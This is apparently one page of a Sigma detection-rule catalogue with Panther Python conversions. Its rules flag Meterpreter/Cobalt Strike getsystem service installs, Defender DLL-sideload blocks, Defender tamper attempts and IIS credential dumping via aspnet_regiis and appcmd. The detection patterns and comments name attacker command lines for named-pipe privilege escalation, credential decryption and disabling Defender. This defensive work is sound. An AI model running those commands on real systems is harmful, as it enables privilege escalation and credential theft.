        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        ServiceFileName|contains|all:
            - '/c'
            - 'echo'
            - '\pipe\'
        ServiceFileName|contains:
            - 'cmd'
            - '%COMSPEC%'
    selection_cli_rundll:
        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
        ServiceFileName|contains|all:
            - 'rundll32'
            - '.dll,a'
            - '/p:'
    selection_cli_share:
        ServiceFileName|startswith: '\\\\127.0.0.1\\ADMIN$\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en
    condition: selection_eid and 1 of selection_cli_*
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

Meterpreter or Cobalt Strike Getsystem Service Installation - System

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

status test author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems) id 843544a7-56e0-4dcc-a44f-5cc266dd97d6

panther query

def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Service Control Manager",
            event.deep_get("EventID", default="") == 7045,
            any(
                [
                    all(
                        [
                            "/c" in event.deep_get("ImagePath", default=""),
                            "echo" in event.deep_get("ImagePath", default=""),
                            "\\pipe\\" in event.deep_get("ImagePath", default=""),
                            any(
                                [
                                    "cmd" in event.deep_get("ImagePath", default=""),
                                    "%COMSPEC%" in event.deep_get("ImagePath", default=""),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "rundll32" in event.deep_get("ImagePath", default=""),
                            ".dll,a" in event.deep_get("ImagePath", default=""),
                            "/p:" in event.deep_get("ImagePath", default=""),
                        ]
                    ),
                    event.deep_get("ImagePath", default="").startswith("\\\\127.0.0.1\\ADMIN$\\"),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Meterpreter or Cobalt Strike Getsystem Service Installation - System
id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
status: test
description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
author: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
date: 2019-10-26
modified: 2023-11-15
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1134.001
    - attack.t1134.002
logsource:
    product: windows
    service: system
detection:
    selection_id:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
    selection_cli_cmd:
        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
        ImagePath|contains|all:
            - '/c'
            - 'echo'
            - '\pipe\'
        ImagePath|contains:
        - 'cmd'
        - '%COMSPEC%'
    selection_cli_rundll:
        # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn
        ImagePath|contains|all:
            - 'rundll32'
            - '.dll,a'
            - '/p:'
    selection_cli_share:
        ImagePath|startswith: '\\\\127.0.0.1\\ADMIN$\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en
    condition: selection_id and 1 of selection_cli_*
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

Microsoft Defender Blocked from Loading Unsigned DLL

Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL

status test author Bhabesh Raj id 0b0ea3cc-99c8-4730-9c53-45deee2a4c86

panther query

def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") in [11, 12],
            any(
                [
                    event.deep_get("ProcessPath", default="").endswith("\\MpCmdRun.exe"),
                    event.deep_get("ProcessPath", default="").endswith("\\NisSrv.exe"),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Microsoft Defender Blocked from Loading Unsigned DLL
id: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86
status: test
description: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
author: Bhabesh Raj
date: 2022-08-02
modified: 2022-09-28
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    service: security-mitigations
detection:
    selection:
        EventID:
            - 11
            - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked
        ProcessPath|endswith:
            - '\MpCmdRun.exe'
            - '\NisSrv.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Microsoft Defender Tamper Protection Trigger

Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"

status stable author Bhabesh Raj, Nasreddine Bencherchali id 49e5bc24-8b86-49f1-b743-535f332c2856

panther query

def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 5013,
            any(
                [
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\DisableAntiSpyware"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\DisableAntiVirus"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\Scan\\DisableArchiveScanning"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Windows Defender\\Scan\\DisableScanningNetworkFiles"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableRealtimeMonitoring"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableBehaviorMonitoring"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableIOAVProtection"
                    ),
                    event.deep_get("Value", default="").endswith(
                        "\\Real-Time Protection\\DisableScriptScanning"
                    ),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Microsoft Defender Tamper Protection Trigger
id: 49e5bc24-8b86-49f1-b743-535f332c2856
status: stable
description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
references:
    - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection
    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
author: Bhabesh Raj, Nasreddine Bencherchali
date: 2021-07-05
modified: 2022-12-06
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: windows
    service: windefend
detection:
    selection:
        EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked.
        Value|endswith:
            - '\Windows Defender\DisableAntiSpyware'
            - '\Windows Defender\DisableAntiVirus'
            - '\Windows Defender\Scan\DisableArchiveScanning'
            - '\Windows Defender\Scan\DisableScanningNetworkFiles'
            - '\Real-Time Protection\DisableRealtimeMonitoring'
            - '\Real-Time Protection\DisableBehaviorMonitoring'
            - '\Real-Time Protection\DisableIOAVProtection'
            - '\Real-Time Protection\DisableScriptScanning'
    condition: selection
falsepositives:
    - Administrator might try to disable defender features during testing (must be investigated)
level: high

Convert to SIEM query

high

Microsoft IIS Connection Strings Decryption

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.

status test author Tim Rauch, Elastic (idea) id 97dbf6e2-e436-44d8-abee-4261b24d3e41

panther query

def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\aspnet_regiis.exe"),
                    event.deep_get("OriginalFileName", default="") == "aspnet_regiis.exe",
                ]
            ),
            "connectionStrings" in event.deep_get("CommandLine", default=""),
            " -pdf" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Microsoft IIS Connection Strings Decryption
id: 97dbf6e2-e436-44d8-abee-4261b24d3e41
status: test
description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
references:
    - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-28
modified: 2022-12-30
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection_name:
        - Image|endswith: '\aspnet_regiis.exe'
        - OriginalFileName: 'aspnet_regiis.exe'
    selection_args:
        CommandLine|contains|all:
            - 'connectionStrings'
            - ' -pdf'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

status test author Tim Rauch, Janantha Marasinghe, Elastic (original idea) id 2d3cdeec-c0db-45b4-aa86-082f7eb75701

panther query

import re


def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\appcmd.exe"),
                    event.deep_get("OriginalFileName", default="") == "appcmd.exe",
                ]
            ),
            "list " in event.deep_get("CommandLine", default=""),
            any(
                [
                    any(
                        [
                            " /config" in event.deep_get("CommandLine", default=""),
                            " /xml" in event.deep_get("CommandLine", default=""),
                            " -config" in event.deep_get("CommandLine", default=""),
                            " -xml" in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                    all(
                        [
                            any(
                                [
                                    " /@t" in event.deep_get("CommandLine", default=""),
                                    " /text" in event.deep_get("CommandLine", default=""),
                                    " /show" in event.deep_get("CommandLine", default=""),
                                    " -@t" in event.deep_get("CommandLine", default=""),
                                    " -text" in event.deep_get("CommandLine", default=""),
                                    " -show" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    re.match(
                                        r"^.*:\\.*.*$", event.deep_get("CommandLine", default="")
                                    ),
                                    "password" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Microsoft IIS Service Account Password Dumped
id: 2d3cdeec-c0db-45b4-aa86-082f7eb75701
status: test
description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
references:
    - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html
    - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA
    - https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/
author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
date: 2022-11-08
modified: 2023-01-22
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection_base_name:
        - Image|endswith: '\appcmd.exe'
        - OriginalFileName: 'appcmd.exe'
    selection_base_list:
        CommandLine|contains: 'list '
    selection_standalone:
        CommandLine|contains:
            - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900
            - ' /xml'
            # We cover the "-" version just in case :)
            - ' -config'
            - ' -xml'
    selection_cmd_flags:
        CommandLine|contains:
            - ' /@t' # Covers both "/@text:*" and "/@t:*"
            - ' /text'
            - ' /show'
            # We cover the "-" version just in case :)
            - ' -@t'
            - ' -text'
            - ' -show'
    selection_cmd_grep:
        CommandLine|contains:
            - ':\*'
            - 'password'
    condition: all of selection_base_* and (selection_standalone or all of selection_cmd_*)
falsepositives:
    - Unknown
level: high

Convert to SIEM query

Showing 751-800 of 3,750

Prev 16 Next